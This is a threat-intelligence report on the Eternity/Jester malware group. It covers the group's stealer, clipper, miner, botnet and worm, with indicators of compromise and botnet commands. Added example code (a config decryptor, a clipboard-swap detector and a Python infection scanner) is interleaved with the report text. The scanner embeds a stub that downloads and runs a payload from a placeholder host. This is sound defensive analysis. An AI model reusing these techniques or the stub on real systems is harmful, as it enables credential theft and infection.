A DEEP DIVE INTO ETERNITY GROUP - A new emerging Cyber Threat May 2022


CYBERSECURITY ANNUAL REPORT


                          DEFENCE BELONGS TO HUMANS….


   Date         Activity           Author
   18/05/2022   Report delivery    Luigi Martire, Carmelo Ragusa

   Table of Content

   Table of Content ........................ 5
   Introduction ............................ 6
   Eternity/Jester Group ................... 7
   The Arsenal ............................. 11
      Jester Stealer ....................... 12
         Web Injection Module .............. 17
         Config Decryption ................. 18
      Merlynn Clipper ...................... 20
         Config Decryption ................. 23
      Trinity Miner ........................ 24
      Lilith Botnet ........................ 26
         Config Decryption ................. 31
   February 2022: the rebrand .............. 32
      Eternity Worm ........................ 34
      Eternity Ransomware .................. 39
   Conclusion .............................. 43
   Appendix ................................ 44
      Indicators of Compromise ............. 44
         Jester Stealer .................... 44
         Merlynn Clipper ................... 46
         Trinity Miner ..................... 46
         Lilith Botnet ..................... 46
         Eternity Ransomware ............... 46
         Eternity Worm ..................... 46
      Yara Rules ........................... 47


   Introduction
   Every month new threats are developed and sold on underground forums, and each of them can grow into a severe
   security risk. Monitoring the darknet is therefore fundamental for threat research and proactive defense.

   During our investigations, we at Yoroi Malware ZLab have found a new emerging cyber-criminal group with great
   potential to become an essential factor inside the cyber security threat landscape. This threat actor calls itself
   “Eternity Group,” previously “Jester Group”; we internally tracked it as “TH-320”.

   The group has been active since at least July/August 2021, when they developed and released their first malware,
   Jester Stealer, with an extensive sponsorship campaign inside the main underground forums. Since then, the group's
   capabilities have increased, and it has released other malicious software.

   For all these reasons, we decided to dig into these malicious operations and create a comprehensive whitepaper
   where we can share all the information about the threat actor.

   Eternity/Jester Group
   During our investigation of this threat, it emerged that TH-320 had covered a large field of malware writing during
   its activity period. Their primary objective is to make money from selling and using malware. Therefore, we have
   summarized all the collected information and classified the TTPs in the following flashcard, and the history of the
   entire group in a comprehensive timeline:

                                   Figure 1: Eternity Group (aka, TH-320, Jester Group)

   The first activities date back to July/August 2021, when the group emerged on 16 different forums and started to
   publish information about their malicious products.


                       Figure 2: Advertising panel of the Eternity Group inside the darknet forums

   The group writes both in English and Russian, so we believe they could have connections with the Russian
   environment. Furthermore, their activity isn’t limited to the development of malware but also includes selling
   private courses and manuals. That model is helpful to them for two reasons: the first is quick money, and the second
   is that they can leverage the course materials to recruit other members for their group.

   An example of the interaction inside the Telegram channel is the following:

                                         Figure 3: JesterGroup Course Advertising

   The first activity we found related to them was the selling of Jester Stealer, which has been gaining rapid
   popularity. So, they caught our attention, and we decided to research it and found several samples.

   Later, we found other collateral malicious projects meant to enlarge their selling capabilities; these are the
   names:

           •     Jester Stealer
           •     Merlynn Clipper
           •     Trinity Miner
           •     Lilith Botnet

   By pivoting on the information found on social networks and their public usernames, we identified at least three
   active members of the cyber-crime gang. Their nicknames are:

           •     LightM4n (aka L1ghtM4n)
           •     Voipdiprincipedibeler2 (aka PRINCIPEDIBELER, PRINCIPEDIBELER2)
           •     drkust0m

       Among the three identified members, LightM4n seems to be the main developer and has several projects on
       GitHub:

                                               Figure 4: L1ghtM4n’s GitHub Account

   One of the most complex tasks of our activity is to track the people behind the threat actor. In this paper, we
   were able to identify the principal operators and developers of the cyber gang with their roles inside it. The
   following scheme shows the members of Eternity Group and their products, where the part of “dr.kust0m” and
   “Voipdiprincipedibeler2” is to advertise them on many Telegram channels.


                                             Figure 5: Scheme of the members

   The last step in tracking Eternity Group is to reconstruct the chronological timeline of its evolution. So, we
   followed the first evidence of advertising inside many darknet forums up to their latest products. The group
   gained popularity very quickly thanks to affiliated groups' advertising, as proved by the scammers who have tried
   to impersonate them. Now they have released a complete arsenal of malware for every need of a cyber-criminal.
   This is a clear sign that we may expect many campaigns related to their products.


                                                    Figure 6: Timeline

   All the tools the cyber gang developed are the subject of the following analysis and dissection. This work helps
   keep track of the TTPs and the evolution of the cyber arsenal.

   The Arsenal
   The group is constantly developing new malicious code and new features for its cyber arsenal, making it a
   complete malicious profit-making company. The following sections provide some technical insights for each
   sample belonging to the gang.

   Jester Stealer
   The first malicious product developed by the threat actor is Jester Stealer. We have evidence that the first versions
   of the malware date back to July/August 2021. The following screen is its advertising panel:

                                      Figure 7: Jester Stealer capabilities advertising

    Hash                   6f7f22d44491f9768519ae4aafc93a543d37186a9ccd1e197e29014a48c13095
    Threat                 Jester Stealer
    Brief Description      .NET Stealer
    SSDEEP                 3072:uKmAqKt6JmD1KieL8U0Hpf/ReAS7s3LYLsz6dh2OGYD9KKRFxsbeKD5uYCC1Mrvs:uKR68Zxe4buu3Wsz6dhLGmFSbvMKqO

   The malicious capabilities of the malware include a kill-switch, anti-analysis techniques and the creation of a
   mutex. The kill-switch works this way: the bytes of salt_upload_data are hashed with SHA256 to derive a registry
   key, “HKEY_CURRENT_USER\SOFTWARE\{hash}\state”; if the value of state equals 1, the sample exits.


                                                     Figure 8: Killswitch

   After these checks, the sample executes the core function devoted to stealing: a thread is spawned for each
   category of stolen data. Finally, the information is stored inside a .txt file and then zipped. The peculiarity of
   this sample is that the archive and the files are created in memory.

                                         Figure 9: Routine devoted to the stealing

   Following is the complete catalog of the stolen data:

       Category                         Stolen Information

       System                           Windows Password Vault, Windows Credentials Manager, List of available
                                        networks, Screenshot

       Gaming                           Steam, Twitch, OBS

       FTP                              FileZilla, WinSCP, CoreFTP, Snowflake

       VPN                              NordVPN, EarthVPN, WindScribeVPN

       Browsers                         Chrome, Firefox, 360Browser, 7Star, Amigo, Brave, Citrio, CentBrowser, Chedot,
                                        Chromodo, CocCoc, Comodo, Coowon, Elements, Epic, Iridium, K-Melon, Kometa, Atom,
                                        ChromePlus, Maxthon3, Edge, Nichrom, Opera, Orbitum, QIP Surf, Sputnik, Torch, Uran,
                                        Vivaldi, Yandex, Liebao, Uran, Chromium

       Messengers                       Telegram, Discord, Pidgin, Outlook, FoxMail, WhatsApp, Signal, RamBox

       Wallets (Address, Balance,       MoneroCore, BitcoinCore, DashcoinCore, DogecoinCore, LitecoinCore, Electrum, Exodus,
       Transactions)                    Atomic, Jaxx, Coinomi, ZCash, Guarda, Wasabi, MetaMask, TronLink, BinanceChain,
                                        Coin98, iWallet, Wombat, MEW CX, NeoLine, Terra Station, Keplr, Sollet, ICONex, KHC,
                                        TezBox, Byone, OneKey, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite
                                        Client. ZilPay, Leaf Wallet, Cyano Wallet, Cyano Wallet Pro, Nabox Wallet, Polymesh
                                        Wallet, Nifty Wallet, Liquality Wallet, Math Wallet, Coinbase Wallet, Clover Wallet, Yoroi,
                                        EQUAL Wallet, BitApp Wallet, Auro Wallet, Saturn Wallet, Ronin Wallet

       Password Managers                BitWarden, KeePass, NordPass, 1Password, RoboForm, Dashlane, Keeper, LastPass,
                                        BrowserPass, MYKI, Splikity, CommonKey, Zoho Vault, Norton, Avira, Trezor,
                                        Authenticator, SSO Authenticator, EOS Authenticator

       Files Grabber

      Table 1: Jester Stealer targeted information

   Then, Jester Stealer proceeds to exfiltrate the stolen information. Once the harvested information has been
   compressed, the malware sends it to the C2. The exfiltration model provides a primary C2 inside the TOR network
   and uses the AnonFiles hosting service as a secondary solution.


                                               Figure 10: Exfiltration over TOR

   In detail, if the C2 is hidden behind the TOR network, the sample enables a proxy. This proxy is enabled by
   executing the tor command-line tool downloaded from the actor’s GitHub repository. Once the proxy has been
   enabled, the sample sends a POST request with the AES-encrypted zip and a summary of the stolen information in
   the header. Otherwise, if the C2 is offline, the sample uploads a .zip using the AnonFiles API; in this case, the
   data contained in the .zip are not encrypted, and the name of the file is the Username concatenated with the
   MachineName.

                                            Figure 11: Exfiltration over Anon Files

   System information is also included in the comment of the archive containing all the stolen data:

                       Figure 12: Archive comment

   Web Injection Module
   During the analysis, we noticed some interesting JavaScript strings: the stealer uses Chrome’s remote debugging
   utility to execute arbitrary JavaScript code. The web inject is very useful to the operator when the victims have
   no saved credentials and the targeted data aren’t available to harvest from a desktop application:

                                            Figure 13: Web Injection capability

   The following is a list of the targeted websites along with the stolen information:

    Target                                                        Content

    Title                                                         document.title

    Current URL                                                   window.location.href

    User Agent                                                    Navigator.userAgent

    Paypal                                                        Browser, Profile, Username, Password, Balance, Cards

    Steam                                                         Browser, Profile, Login, Email, Guard State, Balance,
                                                                  Inventory Items

    Facebook                                                      Browser, Profile, Access Token

    GitHub                                                        Id, Browser, Profile, Account Name, Subscribers,
                                                                  Repositories

    Youtube                                                       Id, Browser, Profile, Channel Name, Subscribers

    Wallets                                                       Balance, Addresses

    Credit Cards                                                  Country, Type, Holder

    Instagram                                                     Account Name, Browser, Profile, Subscribers

   Table 2: Targeted websites

   Config Decryption
   The config is encrypted with AES (CBC, 128-bit) and then BASE64-encoded, so as the first step the strings are
   decoded from BASE64 and then AES-decrypted.


                                    Figure 14: Jester Stealer Config

   The config is made of:

    Field to decrypt                                 Decrypted configuration

    mutex

    key_upload_data                                  Key used to encrypt the files with AES during the
                                                     exfiltration

    salt_upload_data                                 String used as salt to hash the key with SHA256 (can
                                                     be used as campaign identifier)

    C2

    anonfiles_token                                  Used as backup if the C2 is offline, the token is part of
                                                     the anonfiles API

    check_key_verify                                 The hardcoded SHA256 of key_upload_data, is used to
                                                     verify if the hash is the same

   Table 3: Jester Stealer config
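The decryption and verification steps of Table 3, together with the kill-switch derivation described for Figure 8, written out as an added Go example; this is not code from the report or from the malware. It assumes the analyst has already recovered the AES key and IV from the sample (placeholder values here), that fields are PKCS#7-padded, and that both SHA256 digests are hex-encoded; the encrypted config it decrypts is constructed in-line.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"strings"
)

// DecryptField reverses the BASE64 + AES (CBC-128) layering of one config string:
// base64 decode, AES-CBC decrypt, then strip the PKCS#7 padding (.NET's default).
func DecryptField(enc string, key, iv []byte) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(enc)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext is not a whole number of AES blocks")
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", fmt.Errorf("bad PKCS#7 padding: wrong key or IV?")
	}
	return string(pt[:len(pt)-n]), nil
}

// DecryptConfig decrypts every field of Table 3; a failure on any field aborts.
func DecryptConfig(enc map[string]string, key, iv []byte) (map[string]string, error) {
	out := map[string]string{}
	for name, v := range enc {
		p, err := DecryptField(v, key, iv)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
		out[name] = p
	}
	return out, nil
}

// KeyVerifies reproduces the check_key_verify test of Table 3: the hardcoded SHA256
// of key_upload_data must match. A lowercase hex digest is an assumption.
func KeyVerifies(cfg map[string]string) bool {
	sum := sha256.Sum256([]byte(cfg["key_upload_data"]))
	return hex.EncodeToString(sum[:]) == strings.ToLower(cfg["check_key_verify"])
}

// KillSwitchPath derives the registry value the stealer reads before running, i.e.
// HKEY_CURRENT_USER\SOFTWARE\{SHA256(salt_upload_data)}\state (hex digest assumed).
func KillSwitchPath(salt string) string {
	sum := sha256.Sum256([]byte(salt))
	return `HKEY_CURRENT_USER\SOFTWARE\` + hex.EncodeToString(sum[:]) + `\state`
}

// encryptField only exists to build a constructed ciphertext so the example runs offline.
func encryptField(plain string, key, iv []byte) string {
	block, _ := aes.NewCipher(key)
	n := aes.BlockSize - len(plain)%aes.BlockSize
	padded := append([]byte(plain), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(ct)
}

// SampleConfig returns a constructed encrypted config with placeholder values (not IoCs).
func SampleConfig(key, iv []byte) map[string]string {
	sum := sha256.Sum256([]byte("EXAMPLE-UPLOAD-KEY"))
	plain := map[string]string{
		"key_upload_data":  "EXAMPLE-UPLOAD-KEY",
		"salt_upload_data": "example-campaign-salt",
		"check_key_verify": hex.EncodeToString(sum[:]),
	}
	enc := map[string]string{}
	for k, v := range plain {
		enc[k] = encryptField(v, key, iv)
	}
	return enc
}

func main() {
	key := []byte("0123456789abcdef") // placeholder 16-byte AES key recovered from the sample
	iv := []byte("fedcba9876543210")  // placeholder IV
	cfg, err := DecryptConfig(SampleConfig(key, iv), key, iv)
	if err != nil {
		panic(err)
	}
	fmt.Println("decrypted config:", cfg)
	fmt.Println("check_key_verify ok:", KeyVerifies(cfg))
	fmt.Println("kill-switch path:", KillSwitchPath(cfg["salt_upload_data"]))
}
```

Setting the derived state value to 1 on a host is the cheap "vaccine" the kill-switch makes possible, but only for samples built with the same salt_upload_data.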

   Merlynn Clipper
   Merlynn Clipper doesn’t differentiate itself from the usual .NET clipper; its strong points are the constant updates
   and the many supported cryptocurrencies.

                                              Figure 15: Merlynn Clipper Advertising

    Hash                  f948fc3a5970cc6bc0b8b767ec89864daa2542eb09b32a9c952070c8d9ec3e99
    Threat                Merlynn Clipper
    Brief description     .NET Clipper
    SSDEEP                192:oC1NpyPG0AdGyQZpmzWRdIoOrESLnvD/4L8oCXrsujzJoHY568Fs2TvZ/cV4IMJw:oeasdGhioOr5nvD/rPjz+45Nvnye

   Merlynn replaces a cryptocurrency address in the clipboard with the one specified in the config, editable inside a
   builder:


                                            Figure 16: Merlynn Clipper Builder

   In the main method, the sample calls the Install function to achieve persistence by copying itself into the
   Startup directory. Once done, it uses AddClipboardFormatListener and WndProc to monitor changes in the victim's
   clipboard.

                                             Figure 17: Merlynn Clipper Main

   Inside the “ModifyClipboard” method, which is the core of the sample, the clipper replaces the address and sends
   some logs to a Telegram Bot.

                                          Figure 18: Merlynn Clipper Core Routine

      These are the currently supported cryptocurrencies:

                                   Figure 19: Merlynn Clipper supported cryptocurrencies
   Config Decryption
   The addresses and Telegram tokens in the config are AES-encrypted; the key can be easily found in the same
   class.

                                      Figure 20: MerlynnClipper Config decryption

   In the analyzed sample, we found the following wallets:

          Field to decrypt                                   Decrypted configuration

    xmr                      D47hVqg4ztcXE8dBe8JP6Q4KGu6FosHMUZNxkqi2EVXuCcfwkhKjrfxvL8E2X5vy4Mb8KihxnMEsoDXP8fV647yeARRhsv5C

    btc                      1MnCfFdcyrMFcnXJPr4WN5nzTz1ssNcGp7

    eth                      0x3e1769F695e9cc77349Ee7fD5D832Cdad272E477

    doge                     DEc5jVH4mtEhnXNJADiV7Up1K6RuWWoL1Y

    ltc                      LdYqPNQyHT41aFjiUTbq1AzrQSJVWfwD4y

    xrp                      rNCs8WjvZj2TQ2REEWF6EHyQQqs1GQHkZS

    dash                     XouJhwrxkS5W3y9o8zyFuc1f1uUr25MUEq

    TelegramChatId           1504112609

     TelegramBotToken         2097658010:AAFGimMzIL1tvl8SnDSJIEJ14d2Ffc7KtZw

      Mutex                      08ab2ccb-64df-4ec9-97a0-9c3f8eb282cc

     Table 4: Merlynn Clipper config
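A defender-side check for the swap behaviour described for the ModifyClipboard routine, as an added Go example that is not code from the report: it replays a constructed clipboard log in which a copied payee address is overwritten within milliseconds by the btc wallet from Table 4, and flags that as a clipper swap. The address regexes are assumptions covering the common shapes of the coins in Table 4; ClipEvent, DetectClipperSwaps and SampleEvents are hypothetical names.

```go
package main

import (
	"fmt"
	"regexp"
	"time"
)

// ClipEvent is one clipboard write as a clipboard monitor would record it (constructed telemetry).
type ClipEvent struct {
	At   time.Time
	Text string
}

// Alert records one suspected swap: the address the user copied and what replaced it.
type Alert struct {
	Coin, Original, Replaced string
	Delay                    time.Duration
}

// coinPatterns pairs each coin with an assumed address shape; a slice keeps coinOf deterministic.
var coinPatterns = []struct {
	coin string
	re   *regexp.Regexp
}{
	{"btc", regexp.MustCompile(`^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,62})$`)},
	{"eth", regexp.MustCompile(`^0x[0-9a-fA-F]{40}$`)},
	{"ltc", regexp.MustCompile(`^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$`)},
	{"doge", regexp.MustCompile(`^D[5-9A-HJ-NP-U][a-km-zA-HJ-NP-Z1-9]{32}$`)},
	{"dash", regexp.MustCompile(`^X[a-km-zA-HJ-NP-Z1-9]{33}$`)},
	{"xrp", regexp.MustCompile(`^r[a-km-zA-HJ-NP-Z1-9]{24,34}$`)},
}

// coinOf returns which coin an address belongs to, or "" for non-address clipboard content.
func coinOf(text string) string {
	for _, p := range coinPatterns {
		if p.re.MatchString(text) {
			return p.coin
		}
	}
	return ""
}

// DetectClipperSwaps flags the clipper's tell-tale sequence: a copied address is overwritten
// within `window` by a different address of the same coin. Merlynn swaps on the clipboard
// change notification, so the delay is far below any human copy-then-copy interval.
func DetectClipperSwaps(events []ClipEvent, window time.Duration) []Alert {
	var alerts []Alert
	for i := 1; i < len(events); i++ {
		prev, cur := events[i-1], events[i]
		coin := coinOf(prev.Text)
		if coin == "" || coin != coinOf(cur.Text) || prev.Text == cur.Text {
			continue
		}
		if d := cur.At.Sub(prev.At); d <= window {
			alerts = append(alerts, Alert{Coin: coin, Original: prev.Text, Replaced: cur.Text, Delay: d})
		}
	}
	return alerts
}

// SampleEvents is a constructed clipboard log: the victim copies a payee address (placeholder)
// and 40 ms later the clipboard holds the btc wallet from Table 4; the later ETH copies are
// seconds apart, which is ordinary user behaviour and must not alert.
func SampleEvents() []ClipEvent {
	base := time.Date(2022, 5, 18, 10, 0, 0, 0, time.UTC)
	return []ClipEvent{
		{base, "1VictimPayeeAddressAAAAAAAAAAAAAAA"},
		{base.Add(40 * time.Millisecond), "1MnCfFdcyrMFcnXJPr4WN5nzTz1ssNcGp7"},
		{base.Add(2 * time.Second), "meeting notes"},
		{base.Add(3 * time.Second), "0x1111111111111111111111111111111111111111"},
		{base.Add(8 * time.Second), "0x2222222222222222222222222222222222222222"},
	}
}

func main() {
	for _, a := range DetectClipperSwaps(SampleEvents(), time.Second) {
		fmt.Printf("possible clipper: %s %s -> %s after %v\n", a.Coin, a.Original, a.Replaced, a.Delay)
	}
}
```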

     Trinity Miner
     Trinity Miner doesn’t limit itself to just executing XMRig, but tries to be as stealthy as possible compared to
     other miners.

                                                 Figure 21: Trinity Miner Advertising

      Hash                       4ec2be2e2e2bc0dfdc9b8c741fbfab0432f045716d27c3b27ac16fad4cb47dab
      Threat                     Trinity Miner
      Brief description          .NET Xmrig dropper
      SSDEEP                     49152:qzuzgsK8XCwKyblc81KsH7FtfcaSPL/e6988MKMTq3xJTaUbEyit:zzgEywKybm81KQ7F9caSPi69893Oj81t

     The main method is responsible for creating the mutex with a hardcoded string, setting up persistence in the
     Startup folder and executing XMRig, which is stored compressed in the sample’s resources.


                                          Figure 22: Trinity Miner Main method

   Then, the sample checks via WMI whether XMRig is already running. Inside the Start function, the arguments are
   formatted, and XMRig is injected using the process hollowing technique.

                                    Figure 23: Evidence of Process Hollowing API calls

   When the program runs, the process injection into Explorer looks like the following:


                                 Figure 24: Trinity Miner Process Injection into explorer.exe

   Lilith Botnet
   Lilith Botnet is the “all in one” solution provided by the Eternity Group. It has the classic botnet functions plus
   Jester Stealer, Merlynn Clipper and Trinity Miner capabilities.

                                              Figure 25: Lilith Botnet Advertising

    Hash                   150d348ba6d84cd7095f78719e83c7a8ab1445f0d68ae5886f4e731b5aa5882e
    Threat                 Lilith Botnet
    Brief description      .NET Botnet with Stealer and Miner modules
    SSDEEP                 3072:4GzAFH91sQf3ws/PYNnJDZwuK4I+4zgG+mgzWHz+T/qF+bLr5jEt1IZFMCC0gvRs:4Gz/nPPS+mgzMqSF+bLJEt1ku/

   Once the sample starts, three checking methods are executed: the first is a license validation, the second is an
   anti-VM check in which the WMI query “SELECT * FROM Win32_PortConnector” is issued, and the last one checks for
   the presence of some modules related to virtualization programs or antivirus products:

           •    SbieDll
           •    SxIn
           •    Sf2
           •    snxhk
           •    Cmdvrt32

       The sample will then create a Mutex and copy itself to the startup folder.

   Once the preliminary routines have run, Lilith Botnet registers the victim, sending the first information to the C2.
   Then, if the C2 is located inside the TOR network, the sample enables the proxy using the same function seen in
   Jester Stealer.

                                            Figure 26: LilithBot sending victim’s information

   The response is AES-decrypted. If it contains the string “registered successfully,” the sample can also update the
   config field “commandCheckInterval”, used in the Sleep inside the function that determines whether the C2 or the
   victim’s network is offline.


                                            Figure 27: Checking network status

   The value of “parameters” in this case is the command “getCommands”; if the command is successfully retrieved,
   the sample starts a thread of the core function.


                                    Figure 28: LilithBot preparing to receive commands

   This is the list of all the available commands:

    Command                                Description

    Lilith:ServerOffline                   The C2 is offline

    Lilith:NetworkOffline                  The victim’s network is offline

    Lilith:EncKeyFailed                    AES Decryption failed

    DDOS:HttpGET                           GET Requests to a specific target, using the following format:
                                           target?= 

    Advertising:YouTube_ViewVideo          The sample uses the same WebInjection methods as Jester Stealer:
                                           a new tab is simply opened on the passed video url

    Lilith:UpdateConfiguration             N/A

      DDOS:TCPFlood                    TCP Flood with a random buffer of length between 600-2300

      DDOS:UDPFlood                    UDPFlood with a random buffer of length between 60-400

      Advertising:YouTube_Subscribe    New tab of the given channel url, injection of the following Javascript
                                       “document.querySelector(\"#subscribe-button > ytd-subscribe-button-
                                       renderer > tp-yt-paper-button > yt-formatted-string\").click();”

      Lilith:UpdateClient              Update of the client

      Dropper:DownloadExecute          Downloads and executes a given payload; based on the arguments passed,
                                       the operator can choose to bypass the UAC and execute as admin

      Lilith:DeleteClient              Deletes all the created artifacts except extra payloads downloaded with
                                       “Dropper:DownloadExecute”

      Advertising:YouTube_Dislike      New tab of the given video url, injection of the following Javascript:

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(1) > a\").click();",

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(2) > a\").click();"

      NetDiscover:ScanNetwork          Uploads to the C2 as “Network.txt”: IP, MAC, Vendor, Hostname, Ports

      Miner:StopMiner                  Stops the miner process

      DDOS:StopAttacks                 Stops a running DDOS method

      Dropper:ExecuteScript            Executes a given script as BAT or Powershell

      Advertising:YouTube_ViewStream   New tab of a given stream url

      Stealer:RecoverCredentials       Jester Stealer methods

      Advertising:YouTube_Like         New tab of the given video url, injection of the following Javascript:

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(2) > a\").click();",

                                       "document.querySelector(\"#top-level-buttons-computed > ytd-toggle-
                                       button-renderer:nth-child(1) > a\").click();"

      DDOS:HttpPOST                    POST Request Flood with a random buffer of length between 90-400

                                                                                                                 30
A DEEP DIVE INTO ETERNITY GROUP

CYBERSECURITY
    Miner:StartMiner ANNUALTrinity
                              REPORT
                                   Miner methods

      Lilith:ExitClient                     Stops threads, browser, miner and terminate itself

     Table 5: Lilith Botnet commands

     Config Decryption
     Like the others, the config is encrypted with AES, as can be seen in the following figure:

                                                 Figure 29: Lilith Botnet Config

      Field to decrypt       Decrypted configuration

      clientId               GUID
      hostname               hxxp://31.44.5.14:4545/gate/{0}/{1}
      encKey                 c4d8c7f433c1e79afe4eff3a4b05c7c9
      owner                  admin
      license                0FD5E4066478E3DD29AB263903CBA0F3

     Table 6: Lilith Botnet Config

   February 2022: the rebrand
   On February 1st, a message from Jester Group announced a complete rebrand of the group due to the many
   reports of scammers, claiming it would not be a simple rebrand but would include a new name, new projects and more.

                                    Figure 30: Jester Group announcing the rebrand

   The new group has officially operated since 02/02/2022 under the name “Eternity” and started publishing new
   malware: a worm, a ransomware and a RAT, called “EternityWorm,” “EternityRansomware,” and “EternityRAT”
   respectively. On April 10th, they claimed that more than 300 users were registered on the Telegram bot (used as a
   builder for all the projects).

                                Figure 31: Eternity Group showing the registered users

   The homepage of the group revealed that they have six malware families available for purchase:

                                       Figure 32: Eternity Group official website

   Some of them were commented on previously; now we focus on the new malware developed after the
   rebranding operation.

      Eternity Worm
      Eternity Worm is the first malware developed after the rebrand.

                                               Figure 33: Eternity Worm advertising

      Once executed, the worm performs a mutex check, creating the mutex from a hardcoded string, which in this case is
      “hnvkwqubmk”. It then copies itself to “%appdata%\Local\ServiceHub” and sets up a scheduled task (with priority
      “highest” if running as administrator, “limited” otherwise), deletes itself from the old location and executes again
      from the new one.


                                           Figure 34: Setting up the persistence

   The sample now retrieves two payloads:

       •   The first one comes from “hxxp://c.vinhall169.]com/w.exe”, which is the worm itself.
       •   The second is Eternity Clipper, from “hxxp://c.tronlink.]golf/sa/c.exe”.

                                            Figure 35: Downloading payloads

   While downloading the payloads and setting up the persistence, the sample creates a list of threads. The worm
       adds the core routines of its features to that list. One of these malicious features is Discord spam, which
       starts by checking that the string “Look at this. Very good stuff.[URL]” isn’t equal to “0”; it then proceeds to get
       the username and iterate the victim’s channels. The username is retrieved by making a GET request to
       “hxxps://discord.]com/api/users/@me”, which returns a JSON document; the name is built from the field “username”,
       a “#” and the value of the field “discriminator”. The channels are retrieved with a request to
       “hxxps://discord.]com/api/users/@me/channels”, and the result is iterated to get the IDs:

                                                 Figure 36: Setting up discord spam

       The worm now iterates the list of IDs and for each one calls the method “SendMessage”. The message is sent by
       making a POST request to “hxxps://discord.]com/api/v9/channels/{0}/messages”, formatted with the channel ID;
       the content of the message is “Look at this. Very good stuff.[URL]”, with [URL] replaced by the payload.

                                                 Figure 37: Sending spam messages

   The following routine is for the spam on Telegram. After retrieving the private keys, the sample downloads a
       payload from “hxxp://iqox575zftwvbkphhnbdxkg6pfrgcmeos3rebjwdt6ra2r73u5iq2jqd.]onion/shared/worm.exe”,
       which unfortunately we were unable to obtain; this payload is then executed with the key as an argument.

       An interesting feature of this worm is the capability to infect the Python interpreter. It starts by iterating the directory
       “%appdata%\Local\Programs\Python”; for each Python version it gets the file “Lib\os.py” and passes it as an
       argument to the method “Execute,” which takes the parameters “targetFile” (the os.py file), “url” (the payload)
       and “at_start” (a boolean indicating whether the payload is written at the start of the file or at the end).

                                                      Figure 38: Infecting “os.py”

       The url is passed to the method “PreparePayload” which writes the following Python code:

                                                   Figure 42: Payload inside os.py

   The Base64 string contains the code which you can see immediately under it: there are a couple of “try” and
       “except” statements aimed at downloading the payload from the URL “hxxp://c.vinhall169.com/w.]exe” into the
       temporary path and executing it.

       The remaining methods are for the infection of USB drives, local files and the cloud.

       For the local files, the sample iterates these directories:

           •    Desktop
           •    MyPictures
           •    Documents

       For the Cloud:

           •    DropBox
           •    Google Drive
           •    OneDrive

       The files with an extension .py or .pyw will be infected using the same technique for the interpreter.
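A scanner for the infection technique described for the interpreter’s “os.py” and for user “.py”/“.pyw” files, added here as an example (it is not code from the report or from the worm). It looks for the stub the worm writes at the start or at the end of a file: a base64-wrapped blob that, once decoded, downloads a payload into the temp path and runs it. The regexes, the sample files and the placeholder URL are constructed for this example.

```python
"""Added example: detect the base64 stub the worm prepends or appends to
Python files. Heuristics and samples are constructed for this example."""
import base64
import re
from pathlib import Path

# Textual indicators of the stub described in the report (try/except around a
# download to the temp path, then execution). Chosen for this example.
INDICATORS = {
    "exec_of_base64": re.compile(r"exec\s*\(.*b64decode", re.I),
    "b64decode_call": re.compile(r"b64decode\s*\("),
    "download_call": re.compile(r"urlretrieve|urlopen|requests\.get", re.I),
    "run_from_temp": re.compile(r"(subprocess|os\.system|startfile).*(temp|tmp)", re.I),
}
# A quoted base64 literal of 80+ characters has no business inside os.py.
LONG_B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{80,}={0,2})['\"]")


def find_suspicious_lines(source: str, edge: int = 15):
    """Return a list of {"line", "reasons", "at_edge"} dicts for lines that match
    the indicators. "at_edge" marks lines within `edge` lines of the top or the
    bottom of the file, where Execute(at_start=True/False) writes the payload."""
    lines = source.splitlines()
    hits = []
    for no, text in enumerate(lines, 1):
        reasons = [name for name, rx in INDICATORS.items() if rx.search(text)]
        literal = LONG_B64_LITERAL.search(text)
        if literal:
            reasons.append("long_base64_literal")
            try:  # peel one layer: does the blob itself contain the stub?
                inner = base64.b64decode(literal.group(1)).decode("utf-8", "replace")
                if any(rx.search(inner) for rx in INDICATORS.values()):
                    reasons.append("base64_contains_code")
            except ValueError:
                pass
        if reasons:
            hits.append({"line": no, "reasons": reasons,
                         "at_edge": no <= edge or no > len(lines) - edge})
    return hits


def is_infected(source: str) -> bool:
    """Flag a file when an edge line both wraps code in base64 and executes it."""
    return any(h["at_edge"] and "base64_contains_code" in h["reasons"]
               for h in find_suspicious_lines(source))


def scan_tree(root: Path):
    """Walk a directory (e.g. the Python install dir, Desktop, Documents) and
    return {path: hits} for every .py/.pyw file that looks infected."""
    results = {}
    for path in root.rglob("*"):
        if path.suffix.lower() in (".py", ".pyw") and path.is_file():
            src = path.read_text(encoding="utf-8", errors="replace")
            if is_infected(src):
                results[path] = find_suspicious_lines(src)
    return results


# --- constructed samples for a self-contained run (not real malware) ---------
CLEAN_OS_PY = "import sys\nimport abc\n\ndef getcwd():\n    return '.'\n"
# The stub body mimics the described flow; the URL is a placeholder.
_STUB = (
    "import urllib.request, os, tempfile\n"
    "try:\n"
    "    p = os.path.join(tempfile.gettempdir(), 'w.exe')\n"
    "    urllib.request.urlretrieve('http://payload.example.invalid/w.exe', p)\n"
    "    os.startfile(p)\n"
    "except Exception:\n"
    "    pass\n"
)
INFECTED_OS_PY = (
    'exec(__import__("base64").b64decode("'
    + base64.b64encode(_STUB.encode()).decode()
    + '"))\n'
    + CLEAN_OS_PY
)

if __name__ == "__main__":
    print("clean:", is_infected(CLEAN_OS_PY))        # False
    print("infected:", is_infected(INFECTED_OS_PY))  # True
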